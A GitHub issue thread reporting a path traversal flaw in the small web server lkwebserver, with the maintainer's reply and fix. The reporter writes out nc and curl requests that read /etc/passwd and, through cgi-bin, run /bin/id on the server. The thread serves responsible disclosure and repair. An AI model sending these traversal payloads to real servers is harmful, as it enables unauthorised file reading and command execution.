### ISSUE TITLE
security issue: path traversal, any file can be read.

### ISSUE THREAD

**Issue by mheistermann** [robdelacruz/lkwebserver#2]
The code only concatenates the home_dir with the given path, this allows a client to read any file accessible to the server process:
Example:
`echo "GET /../../../../etc/passwd HTTP/1.0\r\n" | nc localhost 8080`
or  `curl --path-as-is 'http://localhost:8080/../../../etc/passwd'`

Also, if the cgi-bin is enabled, arbitrary applications can be executed:
echo "GET /cgi-bin/../../../../../bin/id HTTP/1.0\r\n" | nc -vv localhost 8080
or `curl --path-as-is 'http://localhost:8080/cgi-bin/../../../../bin/id`

I would suggest using realpath(3) to resolve the absolute path and compare that to the allowed home_dir and cgi-bin.

**Comment by mheistermann** [comment]
Also, worse, if the cgi-bin is enabled, arbitrary applications can be executed:
`echo "GET /cgi-bin/../../../../../bin/id HTTP/1.0\r\n" | nc -vv localhost 8080`

**Comment by robdelacruz** [comment]
Thanks, great find. That's a pretty serious security defect. I'll look into realpath(). Thanks again!

**Comment by robdelacruz** [comment]
Fixed in [main ab286e8]: Use absolute paths for reading files and executing cgi files, checking that base directory matches.
